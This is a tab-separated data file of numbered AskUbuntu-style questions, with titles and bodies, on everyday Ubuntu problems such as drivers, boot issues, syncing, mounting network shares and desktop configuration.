16810	hard disk spins down as long as battery is in laptop	i just figured out today that as long as the battery is in my laptop , it does n't matter if it 's fully charged while plugged in , ubuntu always spins down my hard drive . i noticed this because there was a huge difference in speed when i removed the batteries . my settings for power management is basically : on ac power , do n't spin down harddrive , dont suspend or anything on battery power , basically save as much power as possible i assumed that if i plug in my laptop , it 'll use the on ac power settings no matter what but apparently , this is n't so . is there a way to `` fix '' this ?
16811	how well is the hfs+ filesystem supported ?	how well does ubuntu support hfs+ ( i.e . mac formatted ) filesystems ? can it read and write to them , and are there any potential problems to watch out for ?
16813	sometimes keyboard & touchpad work ... sometimes not	when i first ran ubuntu from cd on this dell inspiron 2650 , it worked for about ten to fifteen minutes , then it hung ( i was probably trying to do too much at once from a live cd ) . the next time , my mouse and keyboard did n't work . i rebooted three times and finally got them working . i then installed ubuntu alongside windows xp . after installing , selecting the os in grub worked , but my touchpad and keyboard were again not working . i rebooted , and they worked . ( i fortunately had a usb mouse with which to reboot . ) booting ubuntu and then rebooting to enable my keyboard and touchpad has become a routine ever since . often several reboots are required ; at one point i had to reboot over a dozen times in a row before getting a session where everything worked properly . ( my installation has been in place for about three days a week now . ) i 've looked around for a device manager equivalent to no avail . sometimes the hardware is properly detected , and sometimes it 's not . once or twice i 've had the keyboard detected properly but the touchpad not . plugging in my wireless card also sometimes requires a plug , unplug , and plug again to get it working . so is there some solution ? i 'm without an internet connection at home , and this `` laptop '' is really a wall wart on my desk , so suggestions for packages may take a while to test . xorg logs i captured two three four sample xorg logs : one from a startup where the devices worked ; one from when they did n't ; one from a session where ubuntu thought my touchpad was a normal mouse ; and one from a session where my keyboard worked but the touchpad did n't . see this gist . updated 2010-12-15 01:50 utc with xorg.0.log.keyboardonly file illustrating the case where the keyboard worked but not the touchpad . updated 2011-01-11 04:10 utc with xorg.0.log.touchpadregmouse to illustrate a case where the touchpad was detected as a regular mouse ( no `` touchpad '' tab in mouse prefs ) .
16820	how do i restore compiz advanced zoom ?	i lost compiz zoom due to some incompatibility that i am not sure about . i read about a fix before , but i forgot what it is . when i try to zoom with the super key and mouse it just vibrates the cursor . after further testing to find the problem , i know it has to be something that is trying to put the pointer to the centre of the screen . hopefully someone will be able to track down the cause , because so far i can not . edit - i 've tried all kinds of options , including resetting all the settings on the plugin , still no change . i ca n't zoom , even if i change the keys . if it helps , restraining the mouse to the zoom area makes it jump to one side of the screen . could it be that i have dual outputs that is causing the problem ?
16823	my ubuntu partition is ntfs ?	a while ago i put ubuntu on my windows computer . it was awesome , for a while . one day i restart my computer and it boots with an error message . error : no such device # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # grub-rescue > i could n't boot to windows or ubuntu anymore ... when i finally acquired a live boot cd . i reinstalled grub2 and tried to boot again , but of course it 's not configured to boot to anything ( still need to figure out how to do that ) . what is strange is that when i run sudo fdisk -l from the live cd terminal i get : device boot start end blocks id system /dev/sda1 * 1 25201 202424312 7 hpfs/ntfs /dev/sda2 25201 30402 41771008 7 hpfs/ntfs this certainly looks like my hardrive . i have around 200gb dedicated to windows and 50 to ubuntu , but why is ubuntu ntfs ? when i try exploring my ubuntu partition i ca n't find much ( windows files are fine though ) . i 'll happily give you more information if you ask .
16825	how can i add and change items in my applications menu ?	occasionally i would like to either remove/disable menu entries or add launchers for programs to my applications list- how can i do this ?
16827	ubuntu one , dashboard shows 14.5mb used and files folder shows nothing	hope you can help . my dashboard on ubuntu one shows that i have 14.5mb in the files tab , but under the files section , it is saying the `` lets get started with syncing your files . '' i have synced and stopped syncing folders with files just to test out how it worked. , but i do n't think it was 14.5mb worth of files . is there a way to reset or clear an account ? who would i contact about this issue ? i have tried the `` how do i stop syncing a folder outside the ubuntu one folder ? '' tips . thank you .
16829	is face recognition coming to shotwell ?	are there plans for shotwell to have face recognition and to categorize photos according to faces ?
16837	what are some good ascii art generators ?	i have tried figlet but it 's not much good . are there any other ascii editors ?
16840	apache2 tomcat6 virtual hosting	i 've apache2 and tomcat6 running on port 80 on ubuntu server 9.10 . i 've a registered domain name and i 'll access the jsp index page navigating to http : //abc.mydomain.com . the page is under tomcat_home/webapps/myapp and the below are tomcat virtual hosting in server.xml file : < host name= '' abc.mydomain.com '' debug= '' 0 '' appbase= '' webapps '' unpackwars= '' true '' > < logger classname= '' org.apache.catalina.logger.filelogger '' directory= '' logs '' prefix= '' virtual_log1 . '' suffix= '' .log '' timestamp= '' true '' / > < context path= '' '' docbase= '' /usr/share/tomcat/webapps/myapps '' debug= '' 0 '' reloadable= '' true '' / > < /host > recently a new domain has been bought ( xyz.mydomain.com ) and i 'm asked to do the virtual hosting so that the new domain name directly points the page `` admin.jsp '' which is located under 'tomcat_home/webapps/myapps/we-inf/js/ ' . how could i do this ? if i type http : //abc.mydomain.com/admin i 'll get the page what i wanted . i should access the page just by typing http : //xyz.mydomain.com .
16845	can i change the word ubuntu from my plymouth default theme ?	i have seen that plymouth themes in different distros are the same they just put a logo or a word..so if i want to put whatever i want ... can somebody tell me with what program or editing what file ?
16847	can you force open links that create a new tab , in the same tab ?	i use chromium . many times , i am following links , from one page to another , and i am done with the current tab and dont want to open a link that might possibly open in a new tab . i tried some combination of ctrl , shift , alt and mouse click , but the link still opens in a new tab . can it be done , if at all ? thanks .
16850	chmsee not opening php manual	i have chmsee 1.0.7 installed on ubuntu 10.04 . it opens a small chm files ( 1mb or 2mb files ) but when i try to open php manual chm file which weights about 10mb it does n't open it and does n't show any error message . where is the problem ? has anybody met this problem ever ?
16857	bad lines on desktop	when i expand windows from awn panel i see this lines : this lines easy to remove , but i stil do n't like it . how i can fix it ?
16863	what is the gbas.so file on my home directory ?	i delete the gbas.so file from my home directory but it keeps coming back . where does it come from ?
16866	theme conflict on dual-boot of ubuntu 10.10 & fedora 14	i 've recently been required to migrate to fedora 14 for work , but am not willing to give up the awesomeness of ubuntu . as a result , i 'm now dual-booting fedora 14 and ubuntu maverick with a shared home directory . everything seems to work , but one glaring problem is the fact that the gtk theme configured for each os seems to conflict . if i set the default system theme in fedora , then it looks broken in ubuntu . if i do the same in ubuntu , it is broken in fedora . i 'm under the impression that it should be possible to have each os use a separate theme , and the following tutorial confirms this , but does n't mention how it is achieved : http : //www.hackourlives.com/dual-boot-ubuntu-10-04-and-fedora-13-goddard-with-shared-home/ as shown , i want to use fedora 's theme in fedora , and ubuntu 's theme in ubuntu . how can i have fedora 's and ubuntu 's respective themes co-exist peacefully ?
16867	missing thumbnails for .swf files in nautilus ?	before i upgraded to maverick , .swf files used to have a thumbnail in nautilus . however , nautilus does n't generate thumbnails for them anymore , even after removing ~/.thumbnails/ , which most likely indicates that a package is missing . how do i get nautilus to generate thumbnails for .swf files ? edit : i 've added a bounty , as i believe this question might still be answered ...
16869	broken packages after installing awn lucido from official ppa	after downloading awn lucido build the packages containing the awn applets wo n't install resulting in broken packages , is there a way to fix this mess ? edit : well , the output is in spanish and somehow the broken packages are no longer there now it says the packages do n't exist leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho el paquete awn-applets-c-core-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente el paquete awn-applets-python-core-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente el paquete awn-applets-c-extras-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente el paquete awn-applets-python-extras-trunk no está disponible , pero algún otro paquete hace referencia a él . esto puede significar que el paquete falta , está obsoleto o sólo se encuentra disponible desde alguna otra fuente e : el paquete «awn-applets-c-core-trunk» no tiene candidato de instalación e : el paquete «awn-applets-c-extras-trunk» no tiene candidato de instalación e : el paquete «awn-applets-python-core-trunk» no tiene candidato de instalación e : el paquete «awn-applets-python-extras-trunk» no tiene candidato de instalació
16871	with the update manager constantly updating software , what does it really mean to upgrade ubuntu ?	i was a bit curious to know what a distribution ( i.e . 10.04 to 10.10 ) upgrade really means . correct me if i 'm wrong , but it seems the update manager is constantly upgrading every piece of software on my computer and as i understand it , ubuntu is a `` collection '' of open source software . with that in mind , i would be curious to know what really goes into a distribution upgrade in practice .
16874	boot screen in low graphics/text mode	my ubuntu boot screen shows up in a strange low resolution , almost text mode , instead the usual and sleek white `` ubuntu '' over dark background . it 's not a big issue because when gdm loads everything becomes ok , but if there 's an easy way to fix it i would like to give it a try .
16876	disable compiz shadow for a specific panel ?	in compizconfig-settings-manager there 's an option to enable/disable shadow of windows i.e . gnome-panel . is it possible to enable disable shadow only for a certain panel and not for all panels ? which options can i use beside any or none ?
16879	firefox hangs on ubuntu when loading java applets	i am using firefox 3.6.12 on ubuntu 10.10 amd64 with openjdk jre . firefox seems to hang for a long time when loading applets from websites using java . things seem to work smoothly on windows . i have the same problem with firefox 4.0 b8 . is this a bug with openjdk , firefox or ubuntu ? is there any way to solve the problem ?
16884	hardware recommendations for ubuntu media centre	i currently have an old pc ( amd althon 3200+ , 1.5gb ram , geforce 6500 256mb ) running ubuntu 10.10 that i use as a media centre using vlc player . it plays standard definition videos fine , but high def videos are 'jerky ' , i am assume this is because my hardware ca n't handle it . any suggestions on the minimum spec in terms of cpu , gpu and ram that will be able to handle hd video while playing nice with ubuntu ?
16886	ssh tunnel logging ?	i have a computer running ssh that i would like to give my friends access to , but i do not want them to use my internet connection through ssh tunnelling ( although i 'd like to do so myself ) . is there a way to have a log of when ssh tunnels are created and by which ( local ) users , or , if that 's not possible , only allow some users to do so ?
16888	mp3 player with good podcast support ?	by good podcast support i mean : resuming the audio files where i switched off the player or skipped the file . synching with my podcatcher ( currently i 'm using miro but i could change ) : deleting episodes , i listened to and copy new ones from my hdd to the player . a wifi capable player would be great since i would n't need to switch on the computer but this is not mandatory . i also have an additional condition : the player should not be manufactured by apple .
16891	by default , what system messages get mailed to root ?	i recently installed ssmtp on my server to enable e-mail notifications for a redmine install . while i was verifying everything was setup correctly i got an e-mail notification about a failed cron job . this turned out to be really helpful and i never would have noticed it had i not set this up . it 's been a few days since and i have n't received any other e-mails from the system . by default , what mail gets sent to root ?
16902	graphics trouble after resuming from hibernate or suspend	i have a dell inspiron 2650 ( with nvidia graphics , using nouveau drivers ) that i 'm using to try out ubuntu . it 's all great , except that hibernate and suspend are n't usable . yes , i know that questions about power-save issues are rampant in the linux support universe , but it seems that every time i find a solution it 's for a very specific hardware combination and does n't apply to me . so anyway , here goes . when i resume from either power-saving mode , i 'll get graphics problems anywhere on the range from a few scattered random-colored pixels that wo n't change ; all the way to full-screen patterns that do n't change as i move the mouse , hit keys on the keyboard , or even bring up the shutdown dialog using the power button . those full-screen issues ( which may involve stripes with random pixels , partial black screen , or both ) always end in me forcing the machine to shut down by holding the power button . i have n't done much testing yet to determine what severity level is most commonly associated with each mode , but i do avoid using either power-save option because of these issues . i 'll add info on my hardware as i can gather it ( no home internet connection , and this laptop is tethered to my desk by a dead battery and casing degradation ) . please feel free to request something specific in the question comments . hardware info see this hardinfo report for my system 's hardware configuration . ( no , my username is not `` myuser '' ; i sanitized hardinfo 's output before publishing it . ) screenshots these screenshots are from a relatively mild occurrence , which happened after the second hibernation i took that session . the first one worked great , though i used the wireless card and firefox heavily between the two hibernation attempts . take a look at what happened when i opened my home directory in nautilus and scrolled it : see below for the situations i 've tested so far . the real trouble comes when the machine resumes to an unusable state ; in such cases i ca n't even unlock the screen or properly reboot , much less take a screenshot . i have a hunch that putting a cd in the drive will cause such major failures , and i will try that at some point ; see related question . situations tested maverick ( 10.10 ) suspend seems to suspend nicely with nothing running seems to suspend nicely with flash drive plugged in on resume from suspend with no flash drive , terminal and gedit running : funky graphics on top of log output , then blank screen with pixelated cursor ; no response to power button ( normally will shutdown 60 seconds later ) hibernate seems to hibernate nicely with nothing running seems to hibernate nicely with a few apps ( terminal , mouse preferences ) running seems to not hibernate when flash drive plugged in seems to not hibernate when system monitor is running have encountered failed hibernation ( after several hours and one successful hibernate/thaw cycle ) with no external media connected and no programs running except normal background stuff natty livecd ( 11.04_2010-12-22 ) when i tested it , natty would n't stay logged in . it played part of the login sound and then [ ok ] appeared in the top right corner ( white-on-black terminal text ) for a few seconds . then it kicked me back to the unlock screen . it did that four times before i gave up and just tested suspend from the unlock screen . suspend resumed to vertical gray and black lines 2px ( ? ) wide , then shifted to vertical `` jail bars '' of black over a black screen with above-described random pixels and mouse pointer . no apparent response to input from mouse ( clicking randomly ) . keyboard and touchpad unrecognized .
16904	how do i hide cifs volumes in the places menu ?	i originally started an ubuntu forums post about this but i never received any responses . anyways , i 've got my documents , music , pictures , and videos folders pointing to samba shares on my server via cifs volumes mounted in my fstab file . the problem is i end up with duplicate entries in the places menu . i can remove the bookmarks for those folders but then the menu looks ugly as the mounted volumes are still displayed and i ca n't find a way change their icons in the menu . i 've circled the offending menu entries in the screenshot . how can i hide them ?
16905	how can i get application side-menu on base unity install ?	trying to make a very speedy ubuntu install for my network , i installed the command-line version of natty narwhal and the following packages : xorg , gnome-base , unity my .xinitrc is simply exec ck-launch-session gnome-session . unity appears to be working , though there 's no side-menu like i 'm using to seeing in une . alt+tab does n't switch windows either .
16907	i ca n't find .bash_profile	i am trying to learn how to tweak my shell in the file but ca n't seems to find the file in my home directory or in /etc/profile . is there any other file i need to search for , or am i expected to create one from scratch ?
16912	ncurses prompts look broken in putty from windows	byobu looks very broken in putty . i 've already fixed the key mapping issue , but this issue is n't specified in the man page or even google : notice the misplaced position of the list of windows , the broken selector position , the duplication of the last window , the random a in the top right , and the misplaced apply option . you ca n't see this , but the last option is not selectable . is there some option in putty i need to use in order to see this correctly ?
16913	how to boot from a debootstrap based install ?	i would like to boot a testing ubuntu release from a directory ( which contains a debootstrap based install ) . as far as i understand i just need someway to tell the boot process ( initrd scripts ? ) that it should chroot ( ) into the specified dir immediately after mounting the root partition , and then resume the regular upstart/init start . could someone provide some instructions on how to achieve this ?
16915	how do i get window title bars to stop glitching ?	ever since the upgrade to maverick , i 've noticed that window title bars ( or at least the names listed in them ) take forever to refresh . i sometimes see them cut in half horizontally . also , the hover-over window names i get when i 'm using the compiz scale plugin are often messed up . any idea what i can do to solve this ? i 'm on a compaq presario cq62 which uses intel graphics .
16917	installations , updates and removals always fail . but work after a restart	whenever i install , update or remove something , it fails and i get a message similar to what is below . after i restart , everything appears to work fine . i just installed some updates using update manager , and here were the details shown in the `` package operation failed '' window . installarchives ( ) failed : ( reading database ... [ ... ] run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-23-generic /boot/vmlinuz-2.6.35-23-generic exec : 15 : update-grub : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-23-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-23-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 see the full log here . how can i stop this happening ?
16918	how to listen to audible files ?	does anyone know of any software or solution i can use to listen to audible files in ubuntu ? i 'd rather not have to use wine but i 'm just wondering what other people have come up with .
16919	ubuntu one always hashing something that is not there	i have a bunch of files in the documents folder . when i update most of them they are alright , however there is an xhb file ( used by homebank ) which creates some sort of other file *.xhb~ . ubuntu one sees this file and immediately starts hashing it although it is a temporary file which gets deleted . it then drives up my cpu usage until i kill ubuntu one and start it again . help please . 2010-12-11 09:35:55,673 - ubuntuone.syncdaemon.sync - info - t : none : f 86b46f4f-2c65-4583-9590-af191d790cc7 [ '56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' : :'e6027d46-3d52-44a6-be8b-93421ce5c0c5 ' ] ''documents/praveen.xhb~.uomknv '' | called calculate_hash ( in : t : none : f ) 2010-12-11 09:35:55,675 - ubuntuone.syncdaemon.sync - info - t : none : f 86b46f4f-2c65-4583-9590-af191d790cc7 [ '56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' : :'e6027d46-3d52-44a6-be8b-93421ce5c0c5 ' ] ''documents/praveen.xhb~.uomknv '' | calling calculate_hash ( got hq_hash_error : { } ) 2010-12-11 09:35:55,676 - ubuntuone.syncdaemon.sync - info - t : none : f 86b46f4f-2c65-4583-9590-af191d790cc7 [ '56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' : :'e6027d46-3d52-44a6-be8b-93421ce5c0c5 ' ] ''documents/praveen.xhb~.uomknv '' | called calculate_hash ( in : t : none : f ) 2010-12-11 09:35:55,677 - ubuntuone.syncdaemon.sync - info - t : none : f 86b46f4f-2c65-4583-9590-af191d790cc7 [ '56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' : :'e6027d46-3d52-44a6-be8b-93421ce5c0c5 ' ] ''documents/praveen.xhb~.uomknv '' | calling calculate_hash ( got hq_hash_error : { } ) 2010-12-11 09:35:55,678 - ubuntuone.syncdaemon.sync - info - t : none : f 86b46f4f-2c65-4583-9590-af191d790cc7 [ '56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' : :'e6027d46-3d52-44a6-be8b-93421ce5c0c5 ' ] ''documents/praveen.xhb~.uomknv '' | called calculate_hash ( in : t : none : f )
16925	how to permanently mount a remote share ?	i 've got an nas file server on my local network , in my windows days i just mapped a drive to it and it was just there all the time . i 'm having trouble doing the same in ubuntu . i had done this successfully before using samba-cifs in fstab , but after reconfiguring the box that no longer works and it felt silly since the box itself runs linux ( busybox i believe ) . so at first i tried sshfs . i can access it from the places - > connect to server using ssh , and it 'll pull up in nautilus . i can also mount it via commandline : sshfs -o idmap=user $ user @ < localip > : /mnt/hd_a2 /media/nas-files and it works fine ; however , it asks for a password so i ca n't add that in rc.local to mount on login . i 've tried editing fstab , unsuccessfully , using this command : sshfs # shazzner @ < localip > : /mnt/hd_a2/files /media/nas-files/ fuse user 0 0 for some reason this turns the nas-files folder in a binary file , that appears to be garbage . when i unmount it , it comes back fine . no idea . second , someone in the chat mentioned , autofs . i edited auto.master with : /media/auto /etc/auto.media and in auto.media : nfiles -fstype=fuse , rw , noperm , allow_other , reconnect sshfs\ # // < localip > /mnt/hd_a2/files then restarted autofs , it gives me no error message but the mount is n't there . pulling my hair out with this one , any help ?
16932	how do i install enlightenment ( e17 ) ?	has anybody tried e17 on ubuntu , as an alternative to gnome/kde ? how does one install it ?
16935	how do i set up an mts mblaze modem ?	i have a new mts mblaze broadband modem usb and it is not getting detected in my ubuntu 10 . 04 . it is getting detected as an usb but not as modem as result i am not able to create a mobile broadband connection how to use mts mblaze modem on ubuntu ?
16937	how can i change the default application that archive manager uses ?	when i had installed the rar application the archive manager was using that one which had problems with non-english characters . i uninstalled it and the archive manager used p7zip . the question is how can i make the archive manage ( and extract here ) to use the p7zip instead of rar but have both installed at the same time .
16941	a few items are missing from my panel and i 'm not sure how to get them back	i 'm missing both the me menu and the log out/shutdown/restart , etc applet from my panel and i ca n't find them in the 'add to panel ' list . the screenshot below shows the current state of my panel . how can i get them both back ?
16948	deleting without permission in $ home	i experienced some weird stuff : berni @ zero : ~ $ touch wiki berni @ zero : ~ $ sudo chown root . wiki berni @ zero : ~ $ sudo chmod 000 wiki berni @ zero : ~ $ ls -l wiki -- -- -- -- -- 1 root root 0 2010-12-11 15:14 wiki summary : i created a file which nobody should be able to access in my home ( ~ ) my user has default ubuntu permissions , no system tweaks etc . but i 'm able to delete the file without root permission ! berni @ zero : ~ $ ls -l wiki -- -- -- -- -- 1 root root 0 2010-12-11 15:20 wiki berni @ zero : ~ $ rm wiki rm : remove write-protected regular empty file `wiki ' ? y berni @ zero : ~ $ ls -l wiki ls : can not access wiki : no such file or directory berni @ zero : ~ $ this does not work in /tmp or any other folder ( ! = home ) . does anyone knows why this is the case ?
16951	install fails , can not mount swap	i am trying to fresh install a box to 10.04 ( it was previously 9.10 ) , but during the install process mounting the swap partition fails giving the error : the attempt to mount a file system with type swap in scsi4 ( 0,0,0 ) , partition # 5 ( sda ) at none failed . you may resume partitioning from the partitioning menu . i ran the short-smart tools on it which returned no errors on the disk , its a relatively new disk . suggestions ?
16952	i upgraded ubuntu on my laptop and i have to use the old grub entry for it to work	i upgraded ubuntu on my laptop and i have to use the old boot link for it to work . how can i make my laptop automatically use the working boot-up ? when i use the new grub entry the screen goes blank and the computer seems to hang .
16953	need wired driver for an atheros ar8152	i have bought a new dell inspiron n4010 laptop with windows 7 installed . i have installed ubuntu via wubi . i am using a bsnl broadband connection with a zxdsl 831a11 modem . internet is working fine in windows 7 . but after logging into ubuntu , i am not able to get an internet connection . there is no eth0 connection active . and my network card is : atheros ar8152 pci-e fast ethernet controller some more info by googling : http : //www.downloadatoz.com/driver/articles/download-atheros-ar8152-fast-ethernet-controller-driver-for-dell-laptops.html any way to obtain this driver for ubuntu ?
16956	stuck on libubuntuone1.0-cil , assembly error	after i installed banshee , apt-get is stuck ( neither installed , or uninstalled ) on the libubuntuone1.0-cil package : setting up libubuntuone1.0-cil ( 0.3.8-0ubuntu5 ) ... * installing 1 assembly from libubuntuone1.0-cil into mono e : installing assembly /usr/lib/cli/ubuntuone-sharp-1.0/ubuntuone-sharp.dll failed e : installation of libubuntuone1.0-cil with /usr/share/cli-common/runtimes.d/mono failed dpkg : error processing libubuntuone1.0-cil ( -- configure ) : subprocess installed post-installation script returned error exit status 9 errors were encountered while processing : libubuntuone1.0-cil
16962	how to remove the sendmail mail server from webmin ?	i mean to remove the sendmail mail server on webmin , any idea how to remove it ? thanks .
16966	what causes nautilus to restart whenever i kill it ?	in htop , i kill nautilus , and within one second , it 's back , with a new pid ! the restarted nautilus shows in the processes list , but has no gui until i manually launch nautilus ... i 've heard mention of nautilus works in lockstep with the desktop ... maybe that is the reason ( ? ) . is there some sort of `` watchdog '' program keeping an eye on some distro-critical programs ? monitoring nautilus does n't seem like a linux kernel issue , so i just wonder what is happening here ?
16972	synchronising samba and unix user accounts	is there an easy way to have a samba user automatically created whenever a unix user is created ? currently i 'm using ldap . but it is not that easy , and also very difficult to setup . i 'm looking for a simpler way .
16976	how to speed up `` getting printer information '' ?	whenever i want to print a pdf document in evince , i 'm always slowed down with the `` getting printer information '' process . i was wondering if there was anyway to save the `` printer information '' locally somehow so i 'm not slowed down by the network lookup .
16978	mythtv gui problems	i 'm using mythtv to watch tv on my ubuntu computer and i 'm having a problem with the resolution . it seems that the gui resolution is matched with the channel resolution , so if i 'm watching a hd channel , i get a nice gui but if i 'm watching a sd channel , then it 's crap . a couple of screenshots to show the difference : high definition channel : standard definition channel : i have n't found any similar issue in the internet and neither an option in the settings menu of mythtv ( backend and frontend ) . i have another small problem that you can see in the first screenshot , the channel name is cut ( it shows `` telemadri '' and the last letter is not completely shown ) . anyone know how can i fix this too ? thanks in advance
16979	install via wubi hangs after completion	installation of 10.04 via wubi on my 64 bit ( i7 ) hangs after installation . the only way to restart is to turn off the power . happens after i switched caps with ctrl and started installing wubi on win 7 ( 64 bit ) reverted the caps / ctrl switch , reinstalled ubuntu 64 bit 10.04 via wubi , same issue comes up . the light on my caps key keeps going on and off .
16980	eeepc internal microphone not working	the internal microphone on my eee 1005hab does not work in 10.10 . in 10.04 it did n't work very well ( lot of static ) , but now it dos n't work at all . this is weird because it seemed to work fine when i used a livecd of 10.10 . i can plug in an external mic ( usb or mic jack ) and those both work fine . i think the internal mic is stereo .
16981	how do i install mobile media converter ?	from where can i download mobile media converter for ubuntu ?
16982	`p` key does n't work in x	today i had to force-shutdown my machine after it froze during resume from suspend . since the reboot , i 've found that the p key does n't work normally in x . it does work normally in the console . modified keypresses , e.g . shift-p , ctrl-p , do work normally . pressing p with xev running gives focusout event , serial 34 , synthetic no , window 0x5000001 , mode notifygrab , detail notifyancestor focusin event , serial 34 , synthetic no , window 0x5000001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 34 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 could this problem be happening because of file corruption ? what file would i check for corruption ? i 've done an fsck on the system drive âby running tune2fs -c 200 /dev/sda3 before rebootingâ which seems to have come up clean . i.e . $ sudo tune2fs -l /dev/sda3 | grep 'state\|check' filesystem state : clean last checked : sat dec 11 12:27:16 2010 next check after : thu jun 9 13:27:16 2011 i 'm running an updated ( last dist-upgrade done yesterday ) ubuntu 10.10 .
16983	how do i make my purchased music be synchronized on rhythmbox and in ~./ubuntuone/purchased from ubuntu one ?	i am signed up for the ubuntu one service , and have my computer added . under system → preferences → ubuntu one , i have enabled all synchronizations , including for music . system → prefereneces → ubuntu one , it shows this message : `` synchronization complete '' . but , when ( via rhythmbox ) i purchase a song , no synchronization occurs . i can see the purchased song on the ubuntu one web page , but the `` purchased music '' folder in rhythmbox is empty , and the folder ~/.ubuntuone/purchased from ubuntu one is also empty . ( so , the only way i can get at the song is to manually download it from the ubuntu one web site to my computer . ) i thought that these synchronizations should just happen automatically , but it appears that is not the case for me , and i ca n't figure out why . thanks in advance for any help .
16987	how do i use lightscribe when burning cds and dvds ?	i can i produce those nice images on the back of my dvd ( lightscribe ) ? is it possible on ubuntu ?
16988	how do i install ubuntu to a usb key ? ( without using startup disk creator )	if you are hurrying to reply , system â administration â startup disk creator -- no , that 's not what i 'm talking about . i want to try ubuntu 11.04 's unity without touching my existing ubuntu install . to do this , i need to install the nvidia drivers first ( sigh ) . to do this , i need changes to persist a reboot . to do this , i need to really install ubuntu on a usb key . how do you do that ? what i tried i tried to make a usb key from testdrive , then boot from it , then choose `` install ubuntu . '' the installer refused to install to the installation media itself . i tried , from my installed copy of ubuntu : sudo kvm /dev/sdb -- cdrom .cache/testdrive/iso/ubuntu_natty-desktop-i386.iso ... but the installer did n't detect the disk properly .
16992	how can i listen on global keypress event ?	i want to create myself very tiny app , which will play a sound every time i press a key on my keyboard . i do n't need to know which key on the keyboard was pressed , i just need to somehow know that it happened . are there any global system hooks for pressed key on the keyboard ?
16995	how do i configure keyboard commands ?	in windows i never turn my numlock on . i navigate through the page line with home and end , and when i want to mark a line i use them in a combination with the shift key . pretty basic stuff right ? well i do n't know how to do it in ubuntu 10.04 . the home and end keys work but if i hold the shift key it inputs respectively 7 and 1 . if i turn the numlock on it works but if i am not holding the shift key it prints 7 and 1 again . is there any way i can use my keyboard in ubuntu the same way i do in windows ? p.s . my roomy is much more experienced than me in linux so he suggested that xmodmap might work , but even if this is the approach i should take , i still do n't want to dig into the whole documentation , just the cliff notes for this exact task if you please .
16998	switch between nvidia-current and nouveau without a reboot ?	is it possible to switch between nvidia 's blob and nouveau video drivers on-the-fly ? i think i need to be able to : [ ✓ ] unload nvidia [ ✓ ] unload nouveau [ ✕ ] restore the console after unloading nouveau* [ ✓ ] swap xorg.conf files [ ✓ ] take care of blacklisting [ ✓ ] deal with libglx.so * ) after a bit of talk with the guys at # nouveau , it seems to be difficult or even impossible with the current ubuntu setup ( builtin vesafb ) . i 'm trying to get it to work with uvesafb , but for now the scripts in the answer do what i was looking for .
16999	accidentally typed password in username input , any logs to clear ?	i have accidentally typed my password in ssh 's interactive username prompt . are there any log files that i should clear ?
17001	how to set locale ?	after a clean ubuntu server install , i get the following error when running 'perl ' . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_ca.utf8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . where should i set my locale , system wide and user specific ? if there 's a command line utility to do it i 'd rather use it than manually edit configuration files .
17006	firefox ca n't update extensions	this has been going on for a while now . when there are new updates for firefox add-ons and i start firefox it 's trying to download them but it fails . e.g . the first extension is firebug . after a while i get a dialog : firefox could not install the file at http : //releases.mozilla.org/pub/mozilla.org/addons/1843/firebug-1.6.0-fx.xpi because : download error -228 how can i fix this ?
17012	is it possible to get a list of most recently installed packages ?	is it possible to get a list of packages that were most recently installed through apt-get ?
17017	how to be anonymous on ipv6 protocol by not using mac address in eui-64 ?	the ipv6 protocol has a feature called `` extended unique identifier '' or eui-64 witch in short uses the mac address of the network card when choosing an ipv6 adress . proof : http : //www.youtube.com/watch ? v=30cnqrk0ghe & nr=1 at 7:36 video time . if you want to be anonymous on the internet ( so that nobody can find you when you download something , etc . ) you need this eui-64 to be bipassed in order for the mac address not to be discovered by harmful third parties on the internet and for privacy . how do you avoid eui-64 mac address usage in ipv6 selection in ubuntu ? also for dhcp ipv6 ?
17020	ca n't change visual effects when running unity	i installed ubuntu 10.10 netbook edition on acer aspire one happy . i tried to change the visual effects however it wo n't let me . it says mutter is running , ca n't switch to other effects . i 'd like to know how i can switch to other effects . thank you from now .
17027	how do i install 9.04 in vmware ?	i am about to install ubuntu on vmware ( my host pc is windows 7 ) . are there any tutorials ( step - by - step ) that i can look into .
